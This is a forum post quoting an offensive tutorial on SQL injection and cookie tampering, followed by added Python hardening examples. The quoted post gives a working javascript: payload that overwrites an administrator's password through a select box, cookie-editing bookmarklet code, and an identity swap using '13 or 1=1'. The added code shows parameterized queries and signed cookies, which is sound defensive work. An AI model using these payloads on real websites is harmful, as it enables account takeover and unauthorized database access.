New Post SQL injections to hack(access) website/database information ACQUIRING DATAB
<blockquote data-quote="saamxvr" data-source="post: 4401102" data-attributes="member: 109029">
<p><span style="font-size: 12px"><span style="color: Blue"><strong>ACQUIRING DATABASE INFORMATION</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>A very logical way of acquiring system information from a website's database is by causing errors in the sql queries. These errors can be created through search forms, dynamic links, or session cookies. Most sql injection papers explain how dynamic links and text boxes can be used to execute sql queries but in my opinion, this vulnerability is more common in other input types (select boxes, hidden fields, checkboxes and radio buttons, and cookies!).</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>Mixing data types generally crashes a webpage if it's not well coded. Take, for example, a link to "memberinfo.php?o_id=1". If your goal is to crash that page it would be a good idea to stick in a " or a ' in the o_id variable. If you're lucky you will get a debug message containing the crippled sql query. After you have all the information you need and you know what you're going after you're ready to hack the hell out of every page that you have access to.</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>CHANGING FIELDS' VALUES</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>The first form you think of is the profile page. Most profile pages ignore a user's intellectuals and don't mask out, for example, select boxes. A way of exploiting this vulnerability is by injecting a sql query in the value property of the field.</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>javascript:alert(document.profileform.user_sex.value="gay\',user_password=\'HACKED\' WHERE user_id=1#");</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>If we assume that the server-side sql query looks something like this:</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>"UPDATE user_data SET user_password='$user_password',user_email='$user_email',user_sex='$user_sex' WHERE user_id=$user_id";</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>Then the final query will look somewhat like this:</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>"UPDATE user_data SET user_password='mypassword',user_email='myemail',user_sex='gay',</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>user_password='HACKED' WHERE</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>user_id=1 #' WHERE user_id=7382";</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong># is a sql comment operator.</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>2. Bypassing Session Cookies</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>OVERRIDING BASIC SESSION COOKIE AUTHENTICATION</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>Most of the time session handling is done with the use of cookies. The cookies tell the webpage who you are and what you have access to and what you don't have access to. If the page does not handle session cookies correctly a hacker might be able to change their identity to that of another user's. Cookies are stored in "window.document.cookie". With javascript we are able to erase, edit, create cookies for any website. This task is more complicated than regular types of attacks. I will not go into great detail about how it's done.</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>To View the Cookie:</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>javascript:alert(unescape(document.cookie));</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>To Change Cookie Data:</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>javascript:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);</strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert(c(prompt("cookie name:",""),prompt("replace this value:",""),prompt("with::","")));</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>So if you are logged in as "John Doe" in <a href="http://www.strange-shahn.net/sforums/redirector.php?url=http%3A%2F%2Fwww.ima13370h4x0r.net" target="_blank">www.ima13370h4x0r.net</a> and your session cookie reads:</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>SessionData=</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong>a:3:{s:11:"SessionUser";s:5:"75959";s:9:"SessionID";i:70202768;s:9:"LastVisit";i:1078367189;}</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>The cookie is actually serialized but you should be able to recognize "75959" as your user_id. Some of the time you will find a website that stores data (like user_id) in cookies but does not typecast the data. This is a serious hole in the site's code because any user is able to change their user_id to any other user or administrator user_id.</strong></span></span></p>
<p> <span style="font-size: 12px"><span style="color: Blue"><strong></strong></span></span></p>
<p><span style="font-size: 12px"><span style="color: Blue"><strong>Changing the cookie value is easy once you have declared the window.c function. First change s:5:"75959" to s:x:"ADMINID" where x is the length of the new value. So if you want to change 75959 to 1, you must change s:5:"75959" to s:1:"1" :-) Sometimes you will need to change 75959 to "13 or 1=1" in order to bypass any WHERE statements any sql session queries used to keep you logged in the website.</strong></span></span></p>
</blockquote><p></p>
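As an added example (not part of the quoted post), the UPDATE statement from the post assembled by string interpolation, next to a hardened handler that takes user_id from the server-side session, checks the select-box value against the form's own options, and binds every value as a parameter. The table, the two rows and the ALLOWED_SEX set are constructed for the demo, and sqlite3 stands in for MySQL.

```python
import sqlite3

# Constructed sample data plus the post's UPDATE statement, assembled two ways.
ALLOWED_SEX = {"male", "female", "gay"}  # assumed: the options the form offers
PAYLOAD = "gay',user_password='HACKED' WHERE user_id=1#"  # value from the post

def build_unsafe(user_password, user_email, user_sex, user_id):
    """String interpolation as the post assumes: the select-box value becomes
    SQL text, so its quote closes the literal and the rest is parsed as SQL."""
    return ("UPDATE user_data SET user_password='%s',user_email='%s',"
            "user_sex='%s' WHERE user_id=%s"
            % (user_password, user_email, user_sex, user_id))

def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data (user_id INTEGER PRIMARY KEY,"
               " user_password TEXT, user_email TEXT, user_sex TEXT)")
    db.executemany("INSERT INTO user_data VALUES (?,?,?,?)",
                   [(1, "admin-secret", "admin@example.test", "male"),
                    (7382, "old-pw", "john@example.test", "male")])
    return db

def update_profile_safe(db, session_user_id, user_password, user_email,
                        user_sex, allowlist=True):
    """Hardened handler: id is the int from the server-side session, the
    select-box value must be one the form offers, every value is bound."""
    if not isinstance(session_user_id, int):
        raise TypeError("user_id must be the integer from the session")
    if allowlist and user_sex not in ALLOWED_SEX:
        raise ValueError("select-box value not offered by the form")
    cur = db.execute("UPDATE user_data SET user_password=?, user_email=?,"
                     " user_sex=? WHERE user_id=?",
                     (user_password, user_email, user_sex, session_user_id))
    return cur.rowcount

def row(db, user_id):
    return db.execute("SELECT user_password, user_sex FROM user_data"
                      " WHERE user_id=?", (user_id,)).fetchone()

def demo_profile_update():
    db = setup_db()
    unsafe_sql = build_unsafe("mypassword", "myemail", PAYLOAD, 7382)  # text only
    try:
        update_profile_safe(db, 7382, "mypassword", "myemail", PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    # With the allow-list off, binding still stores the payload as plain text.
    changed = update_profile_safe(db, 7382, "mypassword", "myemail", PAYLOAD, allowlist=False)
    return unsafe_sql, rejected, changed, row(db, 1), row(db, 7382)
```

The unsafe string is only built, never executed; the bound version leaves user 1's password untouched and writes the payload literally into John's own user_sex column.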
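The typecasting the post says is missing, as an added example rather than the post's own code: the serialized cookie from the post is parsed for SessionUser, the id is accepted only as a plain decimal, and an HMAC over the cookie value (SECRET is an assumed server-side key) lets the server detect the s:1:"1" edit the post describes. The third case is signed with the server key only so the decimal check can be seen on its own.

```python
import hashlib
import hmac
import re

SECRET = b"constructed-server-secret"  # assumed: key kept on the server only
# Constructed cookie value: the PHP-serialized array quoted in the post.
COOKIE = ('a:3:{s:11:"SessionUser";s:5:"75959";s:9:"SessionID";i:70202768;'
          's:9:"LastVisit";i:1078367189;}')
USER_RE = re.compile(r's:11:"SessionUser";s:(\d+):"([^"]*)";')

def sign(value):
    """Issue the cookie as value.MAC so any client-side edit is detectable."""
    mac = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + mac

def session_user_id(signed_cookie):
    """Return the integer user id, or None when the MAC does not verify, the
    declared string length disagrees with the content, or the id is not a
    plain decimal (so "13 or 1=1" never reaches a query)."""
    value, sep, mac = signed_cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    m = USER_RE.search(value)
    if m is None or int(m.group(1)) != len(m.group(2)):
        return None
    if not re.fullmatch(r"[0-9]+", m.group(2)):
        return None
    return int(m.group(2))

def demo_cookie():
    good = sign(COOKIE)
    # The post's edit, made after issue: the MAC no longer matches the value.
    edited = good.replace('s:5:"75959"', 's:1:"1"')
    # Signed with the server key only to exercise the decimal check on its own.
    forged = sign(COOKIE.replace('s:5:"75959"', 's:9:"13 or 1=1"'))
    return session_user_id(good), session_user_id(edited), session_user_id(forged)
```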